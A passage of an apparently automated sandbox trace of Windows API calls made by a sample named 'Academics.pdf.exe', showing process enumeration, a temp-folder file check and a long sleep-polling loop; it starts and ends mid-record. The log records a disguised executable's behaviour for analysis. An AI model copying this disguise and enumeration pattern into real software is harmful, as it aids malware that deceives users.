cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0307.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0307.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0307.480] CloseHandle (hObject=0x294) returned 1 [0307.480] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.481] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.482] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.504] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.504] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.504] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.504] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.504] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0307.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0307.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0307.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0307.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0307.506] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0307.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0307.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.507] timeGetTime () returned 0x4cca0 [0307.507] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.507] Sleep (dwMilliseconds=0xa) [0307.507] timeGetTime () returned 0x4ccaf [0307.508] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.508] Sleep (dwMilliseconds=0xa) [0307.523] timeGetTime () returned 0x4ccbf [0307.523] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.523] Sleep (dwMilliseconds=0xa) [0307.539] timeGetTime () returned 0x4cccf [0307.539] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.539] Sleep (dwMilliseconds=0xa) [0307.554] timeGetTime () returned 0x4ccde [0307.554] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.554] Sleep (dwMilliseconds=0xa) [0307.578] timeGetTime () returned 0x4ccee [0307.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0307.578] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0307.579] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0307.579] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0307.579] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0307.579] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.579] Sleep (dwMilliseconds=0xa) [0307.586] timeGetTime () returned 0x4ccfd [0307.586] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.586] Sleep (dwMilliseconds=0xa) [0307.601] timeGetTime () returned 0x4cd0d [0307.601] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.601] Sleep (dwMilliseconds=0xa) [0307.617] timeGetTime () returned 0x4cd1d [0307.617] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.617] Sleep (dwMilliseconds=0xa) [0307.632] timeGetTime () returned 0x4cd2c [0307.632] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.632] Sleep (dwMilliseconds=0xa) [0307.648] timeGetTime () returned 0x4cd3c [0307.648] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.648] Sleep (dwMilliseconds=0xa) [0307.664] timeGetTime () returned 0x4cd4b [0307.664] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.664] Sleep (dwMilliseconds=0xa) [0307.679] timeGetTime () returned 0x4cd5b [0307.679] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.679] Sleep (dwMilliseconds=0xa) [0307.695] timeGetTime () returned 0x4cd6b [0307.695] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.695] Sleep (dwMilliseconds=0xa) [0307.710] timeGetTime () returned 0x4cd7a [0307.710] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.710] Sleep (dwMilliseconds=0xa) [0307.726] timeGetTime () returned 0x4cd8a [0307.726] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.726] Sleep (dwMilliseconds=0xa) [0307.741] timeGetTime () returned 0x4cd99 [0307.742] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.742] Sleep (dwMilliseconds=0xa) [0307.757] timeGetTime () returned 0x4cda9 [0307.757] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.757] Sleep (dwMilliseconds=0xa) [0307.773] timeGetTime () returned 0x4cdb9 [0307.773] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.773] Sleep (dwMilliseconds=0xa) [0307.788] timeGetTime () returned 0x4cdc8 [0307.788] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.788] Sleep (dwMilliseconds=0xa) [0307.804] timeGetTime () returned 0x4cdd8 [0307.804] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.804] Sleep (dwMilliseconds=0xa) [0307.820] timeGetTime () returned 0x4cde7 [0307.820] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.820] Sleep (dwMilliseconds=0xa) [0307.836] timeGetTime () returned 0x4cdf7 [0307.836] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.836] Sleep (dwMilliseconds=0xa) [0307.851] timeGetTime () returned 0x4ce07 [0307.851] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.851] Sleep (dwMilliseconds=0xa) [0307.866] timeGetTime () returned 0x4ce16 [0307.866] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.866] Sleep (dwMilliseconds=0xa) [0307.882] timeGetTime () returned 0x4ce26 [0307.882] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.882] Sleep (dwMilliseconds=0xa) [0307.897] timeGetTime () returned 0x4ce35 [0307.898] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.898] Sleep (dwMilliseconds=0xa) [0307.915] timeGetTime () returned 0x4ce45 [0307.915] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.915] Sleep (dwMilliseconds=0xa) [0307.929] timeGetTime () returned 0x4ce55 [0307.929] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.929] Sleep (dwMilliseconds=0xa) [0307.944] timeGetTime () returned 0x4ce64 [0307.944] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.944] Sleep (dwMilliseconds=0xa) [0307.966] timeGetTime () returned 0x4ce74 [0307.967] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.967] Sleep (dwMilliseconds=0xa) [0307.976] timeGetTime () returned 0x4ce83 [0307.976] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.976] Sleep (dwMilliseconds=0xa) [0307.992] timeGetTime () returned 0x4ce93 [0307.992] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.992] Sleep (dwMilliseconds=0xa) [0308.007] timeGetTime () returned 0x4cea3 [0308.007] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.007] Sleep (dwMilliseconds=0xa) [0308.022] timeGetTime () returned 0x4ceb2 [0308.023] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.023] Sleep (dwMilliseconds=0xa) [0308.038] timeGetTime () returned 0x4cec2 [0308.038] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.038] Sleep (dwMilliseconds=0xa) [0308.054] timeGetTime () returned 0x4ced1 [0308.054] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.054] Sleep (dwMilliseconds=0xa) [0308.069] timeGetTime () returned 0x4cee1 [0308.069] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.069] Sleep (dwMilliseconds=0xa) [0308.085] timeGetTime () returned 0x4cef1 [0308.085] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.085] Sleep (dwMilliseconds=0xa) [0308.100] timeGetTime () returned 0x4cf00 [0308.101] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.101] Sleep (dwMilliseconds=0xa) [0308.116] timeGetTime () returned 0x4cf10 [0308.116] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.116] Sleep (dwMilliseconds=0xa) [0308.132] timeGetTime () returned 0x4cf1f [0308.132] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.132] Sleep (dwMilliseconds=0xa) [0308.147] timeGetTime () returned 0x4cf2f [0308.147] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.147] Sleep (dwMilliseconds=0xa) [0308.163] timeGetTime () returned 0x4cf3f [0308.163] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.163] Sleep (dwMilliseconds=0xa) [0308.178] timeGetTime () returned 0x4cf4e [0308.178] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.179] Sleep (dwMilliseconds=0xa) [0308.194] timeGetTime () returned 0x4cf5e [0308.194] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.194] Sleep (dwMilliseconds=0xa) [0308.210] timeGetTime () returned 0x4cf6d [0308.210] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.210] Sleep (dwMilliseconds=0xa) [0308.225] timeGetTime () returned 0x4cf7d [0308.225] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.225] Sleep (dwMilliseconds=0xa) [0308.241] timeGetTime () returned 0x4cf8d [0308.241] PeekMessageW (in: 